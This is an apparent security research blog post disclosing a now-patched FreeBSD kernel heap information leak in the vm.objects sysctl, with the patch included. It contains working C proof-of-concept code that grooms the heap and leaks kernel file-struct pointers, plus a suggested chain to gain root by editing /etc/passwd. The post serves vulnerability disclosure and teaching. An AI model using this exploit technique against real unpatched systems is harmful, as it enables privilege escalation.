FreeBSD 11.2+ vm.objects sysctl Kernel Heap Information Disclosure
chris
Introduction
FreeBSD 11.2 introduced a kernel heap information disclosure bug: the vm.objects sysctl copies out memory that was never sanitised. The underlying bug had in fact been present since 10.3, where it manifested as a stack information disclosure instead.
While kernel information disclosure bugs aren’t terribly interesting by themselves, they can form an important part of an exploit chain: disclosing useful heap addresses is often essential to paving the way to upgrade a restricted memory corruption vulnerability to an arbitrary read/write capability.
This article describes the bug, discusses simple grooming options for leaking potentially useful pointers and provides a proof-of-concept exploit to demonstrate the issue.
The vulnerability was reported to the FreeBSD Security Officer Team on the 4th of December, 2022, and subsequently patched in January after the holiday season had passed. Thanks again to Philip Paeps from the FreeBSD Security Team for a very fast response.
Vulnerability Overview
For the uninitiated, “sysctl”s are something of a second-class syscall interface. They’re basically system-wide key/value pairs exposed by the kernel for reading (and sometimes writing) through the sysctl(2) syscall.
The sysctl(2) syscall allows userland to provide three high-level pieces of data:
- The key of the sysctl to query.
- An optional userland pointer and size to fetch the “old” value into.
- An optional userland pointer and size to provide a “new” value.
For a lot of sysctls, since they’re system-wide, providing a “new” value requires root privileges. To read some value, userland will typically just provide a pointer/size for the “old” value and leave the “new” pointer/size as NULL/0.
While most sysctls expose simple primitive datatypes, such as strings or integers, some sysctls are more complex and interesting. To serve the more interesting cases, the FreeBSD kernel source provides the SYSCTL_PROC macro, which basically says “declare this sysctl and use that function to handle the request”.
The functions that handle the requests sometimes get less attention than traditional syscalls, so they’re worth exploring for vulnerabilities.
Here’s the vm.objects sysctl definition from the vm/vm_object.c file in the FreeBSD kernel:
static int
[2] sysctl_vm_object_list(SYSCTL_HANDLER_ARGS)
{
    return (vm_object_list_handler(req, false));
}

[1] SYSCTL_PROC(_vm, OID_AUTO, objects, CTLTYPE_STRUCT | CTLFLAG_RW | CTLFLAG_SKIP |
    CTLFLAG_MPSAFE, NULL, 0, sysctl_vm_object_list, "S,kinfo_vmobject",
    "List of VM objects");
We can see the SYSCTL_PROC macro defining the "objects" node of the "vm" root node [1] and referencing the function sysctl_vm_object_list [2] as the handler function.
Notice that the SYSCTL_HANDLER_ARGS macro expands to the standard argument list of a sysctl implementation:
#define SYSCTL_HANDLER_ARGS struct sysctl_oid *oidp, void *arg1, \
    intmax_t arg2, struct sysctl_req *req
Let’s see what actually happens in vm_object_list_handler, then:
static int
vm_object_list_handler(struct sysctl_req *req, bool swap_only)
{
    struct kinfo_vmobject *kvo;
    char *fullpath, *freepath;
    struct vnode *vp;
    struct vattr va;
    vm_object_t obj;
    vm_page_t m;
    u_long sp;
    int count, error;

[3] if (req->oldptr == NULL) {
        /*
         * If an old buffer has not been provided, generate an
         * estimate of the space needed for a subsequent call.
         */
        ...
        return (SYSCTL_OUT(req, NULL, sizeof(struct kinfo_vmobject) *
            count * 11 / 10));
    }

[4] kvo = malloc(sizeof(*kvo), M_TEMP, M_WAITOK);
    error = 0;

    /*
     * VM objects are type stable and are never removed from the
     * list once added. This allows us to safely read obj->object_list
     * after reacquiring the VM object lock.
     */
    mtx_lock(&vm_object_list_mtx);
[5] TAILQ_FOREACH(obj, &vm_object_list, object_list) {
        ...
        if (obj->type == OBJT_DEAD ||
            (swap_only && (obj->flags & (OBJ_ANON | OBJ_SWAP)) == 0))
            continue;
        VM_OBJECT_RLOCK(obj);
        if (obj->type == OBJT_DEAD ||
            (swap_only && (obj->flags & (OBJ_ANON | OBJ_SWAP)) == 0)) {
            VM_OBJECT_RUNLOCK(obj);
            continue;
        }
        mtx_unlock(&vm_object_list_mtx);
[6]     kvo->kvo_size = ptoa(obj->size);
        kvo->kvo_resident = obj->resident_page_count;
        kvo->kvo_ref_count = obj->ref_count;
        ...
        /* Pack record size down */
        kvo->kvo_structsize = offsetof(struct kinfo_vmobject, kvo_path)
            + strlen(kvo->kvo_path) + 1;
        kvo->kvo_structsize = roundup(kvo->kvo_structsize,
            sizeof(uint64_t));
[7]     error = SYSCTL_OUT(req, kvo, kvo->kvo_structsize);
        maybe_yield();
        mtx_lock(&vm_object_list_mtx);
        if (error)
            break;
    }
    mtx_unlock(&vm_object_list_mtx);
    free(kvo, M_TEMP);
    return (error);
}
The purpose of this sysctl is to provide a list of information about virtual memory objects to userland. This could be a pretty lengthy list depending on exactly how many objects are visible to the calling process.
If userland calls the sysctl with a NULL “old” pointer, the kernel returns an estimate of the buffer size that userland should allocate before calling again [3].
If an “old” pointer/size was provided, then the kernel tries to provide as much of the information as possible. It begins by allocating a scratch record that it will populate for each VM object in turn [4]. This is a struct kinfo_vmobject.
Next, it loops through all of the objects on the global vm_object_list [5] and populates that scratch record with various pieces of information. Some of these are shown in the snippet starting at [6], but many are omitted here for brevity.
Once the various fields are set, the kernel copies out the information about this current virtual memory object [7] and continues on to the next one.
The short story of what’s happening, then, is that the kernel iterates over all of the registered virtual memory objects and copies out some information object for each to userland.
The object the kernel uses to store this information is a kinfo_vmobject, and it is particularly interesting because the call to malloc doesn’t pass the M_ZERO flag. That means that the memory will not be zero-initialised by the kernel heap allocator.
If any fields aren’t explicitly set by the logic here, those uninitialised bytes will be copied out to userland.
Sure enough, it seems there are plenty of bytes that remain uninitialised:
/*
 * The "vm.objects" sysctl provides a list of all VM objects in the system
 * via an array of these entries.
 */
struct kinfo_vmobject {
    int kvo_structsize;                 /* Variable size of record. */
    int kvo_type;                       /* Object type: KVME_TYPE_*. */
    uint64_t kvo_size;                  /* Object size in pages. */
    uint64_t kvo_vn_fileid;             /* inode number if vnode. */
    uint32_t kvo_vn_fsid_freebsd11;     /* dev_t of vnode location. */
    int kvo_ref_count;                  /* Reference count. */
    int kvo_shadow_count;               /* Shadow count. */
    int kvo_memattr;                    /* Memory attribute. */
    uint64_t kvo_resident;              /* Number of resident pages. */
    uint64_t kvo_active;                /* Number of active pages. */
    uint64_t kvo_inactive;              /* Number of inactive pages. */
    union {
        uint64_t _kvo_vn_fsid;
        uint64_t _kvo_backing_obj;      /* Handle for the backing obj */
    } kvo_type_spec;                    /* Type-specific union */
    uint64_t kvo_me;                    /* Uniq handle for anon obj */
    uint64_t _kvo_qspare[6];
    uint32_t kvo_swapped;               /* Number of swapped pages */
    uint32_t _kvo_ispare[7];
    char kvo_path[PATH_MAX];            /* Pathname, if any. */
};
At first glance, it looks like we’ve struck info-disclosure gold with the very large kvo_path field at the end (PATH_MAX is 1024), but if we refer back to the copyout logic, the kernel uses the strlen of that field as an upper bound on what it copies out.
Even so, there are a few “spare” fields that provide more than enough useful bytes to leak.
Exploitability Analysis
Uninitialised kernel heap disclosures aren’t useful in every case. The case here is pretty promising, however, because the allocation comes from the general purpose heap (i.e. through malloc) and there are clearly plenty of bytes for us to target with a groom in the _kvo_qspare and _kvo_ispare fields.
So long as we can think of a way to get some useful kernel heap pointers leaked through those fields, this is a useful leak to have.
Before getting to the point of considering useful leaks, however, we should demonstrate the trivial case: leaking a bunch of bytes we can control as a starting point.
The ioctl(2) syscall is a good candidate for this:
int
sys_ioctl(struct thread *td, struct ioctl_args *uap)
{
    u_char smalldata[SYS_IOCTL_SMALL_SIZE] __aligned(SYS_IOCTL_SMALL_ALIGN);
    uint32_t com;
    int arg, error;
    u_int size;
    caddr_t data;
    ...
[1] size = IOCPARM_LEN(com);
    ...
    if (size > 0) {
        if (com & IOC_VOID) {
            ...
        } else {
            if (size > SYS_IOCTL_SMALL_SIZE)
[2]             data = malloc((u_long)size, M_IOCTLOPS, M_WAITOK);
            else
                data = smalldata;
        }
    ...
    if (com & IOC_IN) {
[3]     error = copyin(uap->data, data, (u_int)size);
    ...
    error = kern_ioctl(td, uap->fd, com, data);
    if (error == 0 && (com & IOC_OUT))
        error = copyout(data, uap->data, (u_int)size);
out:
    if (size > SYS_IOCTL_SMALL_SIZE)
[4]     free(data, M_IOCTLOPS);
    return (error);
}
The size of the data from userland is extracted from the ioctl command itself using the IOCPARM_LEN macro [1]. For small sizes, the kernel uses a buffer on the stack, but over a certain limit it allocates a buffer of that size using malloc [2]. This limit is 128 bytes.
With a buffer allocated, it then does a copyin [3], calls down to kern_ioctl and then frees the buffer on the exit path [4].
Why is this useful? The FreeBSD kernel heap allocator works in a LIFO fashion: malloc returns the most recently freed chunk of memory (for the same size class). That means that if we invoke a spurious ioctl (or an ioctl on a spurious file descriptor), it becomes a simple malloc, copyin, free gadget that we can use to control the uninitialised bytes of the next malloc.
If the next malloc is the one from the vm.objects sysctl then we should see those bytes coming back to us.
Here’s a simple PoC to test:
#include <err.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/sysctl.h>
#include <sys/user.h>
#include <unistd.h>

static void
hexdump(const void *data, size_t datasz)
{
    const unsigned char *b = data;
    size_t n;

    for (n = 0; n < datasz; ++n) {
        fprintf(stderr, "%02x ", b[n]);
        switch ((n + 1) & 0xf) {
        case 0: fputs("\n", stderr); break;
        case 8: fputs(" ", stderr); break;
        }
    }
    fputs("\n", stderr);
}

static void
prep_leak(void)
{
    unsigned char dummy[sizeof(struct kinfo_vmobject)];

    memset(dummy, 'A', sizeof(dummy));
    ioctl(-1, _IOW(0, 0, dummy), dummy);
}

int
main(int argc, char *argv[])
{
    unsigned char buf[sizeof(struct kinfo_vmobject)];
    size_t bufsz = sizeof(buf);

    bzero(buf, sizeof(buf));
    prep_leak();
    sysctlbyname("vm.objects", buf, &bufsz, NULL, 0);
    hexdump(buf, bufsz);
    return 0;
}
Trying it out, we can see our controlled data:
$ cc -o vm_objects vm_objects.c && ./vm_objects
a8 00 00 00 01 00 00 00 00 40 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00
00 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
00 41 41 41 41 41 41 41 a8 00 00 00 01 00 00 00
00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 01 00 00 00 00 00 00 00 02 00 00 00
04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 00 41 41 41 41 41 41 41
a8 00 00 00 01 00 00 00 00 40 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00
00 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
00 41 41 41 41 41 41 41 a8 00 00 00 01 00 00 00
00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 01 00 00 00 00 00 00 00 02 00 00 00
04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 00 41 41 41 41 41 41 41
a8 00 00 00 01 00 00 00 00 40 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00
00 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
00 41 41 41 41 41 41 41 a8 00 00 00 01 00 00 00
00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 01 00 00 00 00 00 00 00 02 00 00 00
04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 00 41 41 41 41 41 41 41
a8 00 00 00 01 00 00 00 00 40 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00
00 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
00 41 41 41 41 41 41 41 a8 00 00 00 05 00 00 00
You’ll notice a lot of repeated data here. That’s because we provided a buffer big enough to fit a whole struct kinfo_vmobject, but since the strlen of the path limits each copyout, each virtual memory object actually occupies only a small part of the buffer.
The repeating runs of 0x41 bytes are the “spare” fields that we’re seeing for each object.
Finding a Leak Target
When in possession of a kernel heap information disclosure bug like this, we need to do a little research to groom the heap in a way that leaks some data we actually care about. Sadly, nobody cares about leaking "AAAA...", so we’ll need to think some more.
The first thing we need to understand is which malloc bucket this leak is coming from. The kernel heap allocator coarsely organises its internal allocation buckets by size. To determine which bucket this particular leak is coming from, we need to know the size of the kinfo_vmobject struct:
$ lldb /boot/kernel/kernel
(lldb) target create "/boot/kernel/kernel"
Current executable set to '/boot/kernel/kernel' (aarch64).
(lldb) p sizeof(struct kinfo_vmobject)
(unsigned long) $0 = 1184
And check that against the malloc bucket sizes defined in kern/kern_malloc.c:
struct {
    int kz_size;
    const char *kz_name;
    uma_zone_t kz_zone[MALLOC_DEBUG_MAXZONES];
} kmemzones[] = {
    {16, "malloc-16", },
    {32, "malloc-32", },
    {64, "malloc-64", },
    {128, "malloc-128", },
    {256, "malloc-256", },
    {384, "malloc-384", },
    {512, "malloc-512", },
    {1024, "malloc-1024", },
    {2048, "malloc-2048", },
    {4096, "malloc-4096", },
    {8192, "malloc-8192", },
    {16384, "malloc-16384", },
    {32768, "malloc-32768", },
    {65536, "malloc-65536", },
    {0, NULL},
};
Since the size of the object is 1184 bytes, it’s too big to come from the 1024 bucket – it must be from the 2048 bucket.
Whatever we’re trying to leak, it has to come from the same bucket and has to contain something useful.
This is where a hunt for “elastic objects” is pretty handy. Rather than just looking for single structs of the right size that happen to be allocated using malloc, we can look for calls to malloc that have some dynamic element to them.
One such useful elastic object is the allocation done when file descriptors are sent over a UNIX domain socket with the SCM_RIGHTS auxiliary control message (“cmsg”).
Leaking File Structs with SCM_RIGHTS
The uipc_send kernel function handles the guts of sending data over a UNIX domain socket:
static int
uipc_send(struct socket *so, int flags, struct mbuf *m, struct sockaddr *nam,
    struct mbuf *control, struct thread *td)
{
    ...
    if (control != NULL &&
[1]     (error = unp_internalize(&control, td, NULL, NULL, NULL)))
        goto release;
If an auxiliary control message was passed to the sendmsg(2) syscall, the kernel calls unp_internalize [1].
Control messages are basically extra bits of information that can be sent with a message. The control messages themselves are just sent in an array, one after another, and each message in that list can have a different “type”, length and associated data.
For UNIX domain sockets, there are a few different types of extra data that a process can send in this way, but the one we’re interested in here is SCM_RIGHTS, which allows a process to send file descriptors to the recipient. It’s an interesting and neat feature that we can see unp_internalize handle:
static int
unp_internalize(struct mbuf **controlp, struct thread *td,
    struct mbuf **clast, u_int *space, u_int *mbcnt)
{
    struct mbuf *control, **initial_controlp;
    struct proc *p;
    struct filedesc *fdesc;
    struct bintime *bt;
    struct cmsghdr *cm;
    struct cmsgcred *cmcred;
    struct filedescent *fde, **fdep, *fdev;
    struct file *fp;
    struct timeval *tv;
    struct timespec *ts;
    void *data;
    socklen_t clen, datalen;
    int i, j, error, *fdp, oldfds;
    u_int newlen;

    MPASS((*controlp)->m_next == NULL); /* COMPAT_OLDSOCK may violate */
    UNP_LINK_UNLOCK_ASSERT();

    p = td->td_proc;
    fdesc = p->p_fd;
    error = 0;
    control = *controlp;
    *controlp = NULL;
    initial_controlp = controlp;
[2] for (clen = control->m_len, cm = mtod(control, struct cmsghdr *),
        data = CMSG_DATA(cm);
        clen >= sizeof(*cm) && cm->cmsg_level == SOL_SOCKET &&
        clen >= cm->cmsg_len && cm->cmsg_len >= sizeof(*cm) &&
        (char *)cm + cm->cmsg_len >= (char *)data;
        clen -= min(CMSG_SPACE(datalen), clen),
        cm = (struct cmsghdr *) ((char *)cm + CMSG_SPACE(datalen)),
        data = CMSG_DATA(cm)) {
        ...
        datalen = (char *)cm + cm->cmsg_len - (char *)data;
        switch (cm->cmsg_type) {
        ...
        case SCM_RIGHTS:
[3]         oldfds = datalen / sizeof (int);
            if (oldfds == 0)
                continue;
            /* On some machines sizeof pointer is bigger than
             * sizeof int, so we need to check if data fits into
             * single mbuf. We could allocate several mbufs, and
             * unp_externalize() should even properly handle that.
             * But it is not worth to complicate the code for an
             * insane scenario of passing over 200 file descriptors
             * at once.
             */
            newlen = oldfds * sizeof(fdep[0]);
            if (CMSG_SPACE(newlen) > MCLBYTES) {
                error = EMSGSIZE;
                goto out;
            }
            /*
             * Check that all the FDs passed in refer to legal
             * files. If not, reject the entire operation.
             */
            fdp = data;
            FILEDESC_SLOCK(fdesc);
[4]         for (i = 0; i < oldfds; i++, fdp++) {
                fp = fget_noref(fdesc, *fdp);
                if (fp == NULL) {
                    FILEDESC_SUNLOCK(fdesc);
                    error = EBADF;
                    goto out;
                }
                if (!(fp->f_ops->fo_flags & DFLAG_PASSABLE)) {
                    FILEDESC_SUNLOCK(fdesc);
                    error = EOPNOTSUPP;
                    goto out;
                }
            }

            /*
             * Now replace the integer FDs with pointers to the
             * file structure and capability rights.
             */
[5]         *controlp = sbcreatecontrol(NULL, newlen,
                SCM_RIGHTS, SOL_SOCKET, M_WAITOK);
            fdp = data;
[6]         for (i = 0; i < oldfds; i++, fdp++) {
                if (!fhold(fdesc->fd_ofiles[*fdp].fde_file)) {
                    fdp = data;
                    for (j = 0; j < i; j++, fdp++) {
                        fdrop(fdesc->fd_ofiles[*fdp].
                            fde_file, td);
                    }
                    FILEDESC_SUNLOCK(fdesc);
                    error = EBADF;
                    goto out;
                }
            }
            fdp = data;
            fdep = (struct filedescent **)
                CMSG_DATA(mtod(*controlp, struct cmsghdr *));
[7]         fdev = malloc(sizeof(*fdev) * oldfds, M_FILECAPS,
                M_WAITOK);
[8]         for (i = 0; i < oldfds; i++, fdev++, fdp++) {
                fde = &fdesc->fd_ofiles[*fdp];
                fdep[i] = fdev;
[9]             fdep[i]->fde_file = fde->fde_file;
                filecaps_copy(&fde->fde_caps,
                    &fdep[i]->fde_caps, true);
                unp_internalize_fp(fdep[i]->fde_file);
            }
            FILEDESC_SUNLOCK(fdesc);
            break;
        ...
This code looks long and complex, but we needn’t fear it. At the top level, the code loops over the list of cmsgs [2] and switches on the type of each. For a control message of type SCM_RIGHTS, the kernel first determines how many file descriptors follow the cmsg header [3].
Next, it loops over all of the file descriptors making sure that they’re able to be sent [4] (some types of file are forbidden from being sent like this) before allocating an mbuf to hold an array of filedescent pointers [5]. mbufs are a unit of heap allocation specific to the networking stack in FreeBSD. They’re backed by their own special zone and arbitrary lengths are constructed by creating a linked list of mbufs. We can largely ignore them for the discussion here.
A filedescent is how an open file within a process’ file descriptor table is represented. In fact, a numeric file descriptor is literally just an index into a table of these structures:
struct filedescent {
    struct file *fde_file;      /* file structure for open file */
    struct filecaps fde_caps;   /* per-descriptor rights */
    uint8_t fde_flags;          /* per-process open file flags */
    seqc_t fde_seqc;            /* keep file and caps in sync */
};
Each entry points to the file struct that’s open and has some other associated fields (e.g. whether UF_CLOEXEC has been set for that descriptor).
Remember that at this point the kernel’s only allocated an array of pointers to these.
With an array of filedescent pointers allocated, the next step is to walk over the list of file descriptors again and obtain a reference to each [6]. If this fails for any, the whole process is aborted.
Finally, the kernel has determined that the descriptors are sendable and it was able to acquire a reference on each. The last step is to allocate an array to hold the actual filedescent structs [7], then loop over the descriptors one last time [8], setting each filedescent pointer in the mbuf to an element of this newly malloc'd array [9].
Here’s a rough diagram of how this data will look:
┌────────────────────────────────────────────────────────────────────────────────┐
│mbuf_t │
├──────────────┬─────────────────────────────────────────────────────────────────┤
│ m_hdr │ m_data │
└──────────────┴─────────────────────────────────────────────────────────────────┘
│
┌──────────────┬──────────────┬──────┴───────┬──────────────┐
▼ ▼ ▼ ▼ ▼
┌──────────────┬──────────────┬──────────────┬──────────────┬──────────────┐
│ filedescent │ filedescent │ filedescent │ filedescent │ filedescent │
├──────────────┴──────────────┴──────────────┴──────────────┴──────────────┤
│malloc(nfd * sizeof(struct filedescent)) │
└──────────────────────────────────────────────────────────────────────────┘
When the UNIX message is received by the recipient process, this process is reversed: the filedescents are pulled out of the control message and inserted into the receiving process’ file descriptor table. The array of filedescents that was allocated in unp_internalize is freed once this is done. See unp_externalize if you’re interested.
The elastic object we’re interested in leaking is the array of filedescent structs at [7]. By leaking the contents of that array, we can discover a kernel pointer to a live file struct. That’s a useful pointer to have if we have an arbitrary write, since we can do interesting things like granting write access to a file we have open for reading (e.g. /etc/passwd or /etc/libmap.conf; see man libmap.conf to spark your imagination).
We can control the size of the malloc through the number of file descriptors we send in our cmsg. Hitting our target is simple:
$ lldb /boot/kernel/kernel
(lldb) target create "/boot/kernel/kernel"
Current executable set to '/boot/kernel/kernel' (aarch64).
(lldb) p sizeof(struct kinfo_vmobject) / sizeof(struct filedescent)
(unsigned long) $0 = 24
We just need to send 24 file descriptors.
Proof of Concept
Our final exploitation strategy is:
- Create a connected pair of UNIX domain sockets with socketpair(2).
- Fork and have the child process block on a recv(2).
- Open the file that we wish to disclose the file pointer of.
- Send a message to the child process with an SCM_RIGHTS cmsg containing 24 copies of that file descriptor.
- Once the descriptors have been received by the child, leak memory via the vm.objects sysctl.
Here’s a simple PoC:
/*
 * FreeBSD 11.2+ vm.objects sysctl Kernel Heap Information Disclosure PoC
 * 2022-Dec-08
 *
 * [email protected]
 */
#include <err.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <sys/types.h>
#include <sys/cpuset.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/sysctl.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>

static void
pin_to_cpu(size_t n)
{
    cpuset_t cs;

    CPU_ZERO(&cs);
    CPU_SET(n, &cs);
    if (-1 == cpuset_setaffinity(CPU_LEVEL_WHICH, CPU_WHICH_PID, -1,
        sizeof(cs), &cs))
        err(1, "cpuset_setaffinity");
}

static void
child_proc(int sock)
{
    unsigned char ack = 0;

    /* receive the file descriptors */
    if (-1 == recv(sock, &ack, sizeof(ack), 0))
        err(1, "recv");
    /* acknowledge receipt so we know the buffer is free */
    if (-1 == send(sock, &ack, sizeof(ack), 0))
        err(1, "send");
}

#define NFDS (sizeof(struct kinfo_vmobject) / sizeof(struct filedescent))

static const void *
leak_kptr(int fd)
{
    struct kinfo_vmobject buf;
    size_t bufsz = sizeof(buf);
    pid_t child;
    int s[2];
    unsigned char ack = 0;
    struct iovec iov = {
        .iov_base = &ack,
        .iov_len = sizeof(ack)
    };
    unsigned char cmsgbuf[CMSG_SPACE(sizeof(int) * NFDS)];
    struct cmsghdr *cmsgh;
    struct msghdr msgh;
    size_t n;
    int *pfd;

    if (-1 == socketpair(AF_UNIX, SOCK_STREAM, PF_UNSPEC, s))
        err(1, "socketpair");
    switch ((child = fork())) {
    case -1: err(1, "fork");
    case 0:
        /* child will receive the fds */
        close(s[0]);
        pin_to_cpu(0);
        child_proc(s[1]);
        exit(0);
    }
    /* this proc will send the fds */
    close(s[1]);
    pin_to_cpu(0);
    /* set up the cmsg first */
    bzero(cmsgbuf, sizeof(cmsgbuf));
    cmsgh = (struct cmsghdr *)cmsgbuf;
    cmsgh->cmsg_level = SOL_SOCKET;
    cmsgh->cmsg_type = SCM_RIGHTS;
    cmsgh->cmsg_len = CMSG_LEN(sizeof(int) * NFDS);
    for (pfd = (int *)CMSG_DATA(cmsgh), n = 0; n < NFDS; ++n) {
        *pfd++ = fd;
    }
    /* now the msghdr */
    bzero(&msgh, sizeof(msgh));
    msgh.msg_iov = &iov;
    msgh.msg_iovlen = 1;
    msgh.msg_control = cmsgh;
    msgh.msg_controllen = cmsgh->cmsg_len;
    /* send and await ack */
    if (-1 == sendmsg(s[0], &msgh, 0))
        err(1, "sendmsg");
    if (-1 == recv(s[0], &ack, 1, 0))
        err(1, "recv");
    /* now we can leak the buffer */
    bzero(&buf, sizeof(buf));
    sysctlbyname("vm.objects", &buf, &bufsz, NULL, 0);
    /* and reap the child */
    waitpid(child, NULL, 0);
    return *(const void **)(&buf._kvo_qspare[3]);
}

int
main(int argc, char *argv[])
{
    int fd[2];

    /* open some interesting files to leak: */
    if (-1 == (fd[0] = open("/etc/passwd", O_RDONLY)))
        err(1, "open");
    if (-1 == (fd[1] = open("/etc/libmap.conf", O_RDONLY)))
        err(1, "open");
    fprintf(stderr, "[+] /etc/passwd file ptr: %p\n", leak_kptr(fd[0]));
    fprintf(stderr, "[+] /etc/libmap.conf file ptr: %p\n", leak_kptr(fd[1]));
    /* close and re-open to show LIFO behaviour: */
    fputs("[+] close + reopen\n", stderr);
    close(fd[1]);
    if (-1 == (fd[1] = open("/etc/libmap.conf", O_RDONLY)))
        err(1, "open");
    fprintf(stderr, "[+] /etc/libmap.conf file ptr (again): %p\n", leak_kptr(fd[1]));
    return 0;
}
The output of running it:
$ cc -o vm_objects vm_objects.c && ./vm_objects
[+] /etc/passwd file ptr: 0xfffffd00009db6e0
[+] /etc/libmap.conf file ptr: 0xfffffd00009db410
[+] close + reopen
[+] /etc/libmap.conf file ptr (again): 0xfffffd00009db410
Success. Now we can chain that arbitrary write vulnerability to grant us write-access to /etc/passwd, add an empty-password root user and elevate.
What do you mean you don’t have an arbitrary write vulnerability…?
Fix
The fix for this bug is super simple: the malloc in vm_object_list_handler just needs to include the M_ZERO flag. This ensures that the memory is zero-initialised and nothing useful will leak back to userland:
--- a/sys/vm/vm_object.c
+++ b/sys/vm/vm_object.c
@@ -2523,7 +2523,7 @@ vm_object_list_handler(struct sysctl_req *req, bool swap_only)
             count * 11 / 10));
     }
-    kvo = malloc(sizeof(*kvo), M_TEMP, M_WAITOK);
+    kvo = malloc(sizeof(*kvo), M_TEMP, M_WAITOK | M_ZERO);
     error = 0;
     /*
Conclusion
FreeBSD tends to do a decent job of preventing information disclosure bugs these days, but it really depends on the developer remembering to do the right thing at the right time; it’s quite error-prone.
We were lucky in this case that the leaky allocation came from the general-purpose heap allocator. For many other types of object, if they originate from a dedicated zone, it’s generally not possible to control the leak as easily as we did here.
Even so, these bugs can be fun to play with and don’t require a huge amount of effort to make into useful parts of a chain. It’s worth finding them.
For context on the effort put into this research: I spent around an hour walking through a bunch of sysctls before finding this, and writing the PoC took maybe 30 minutes altogether.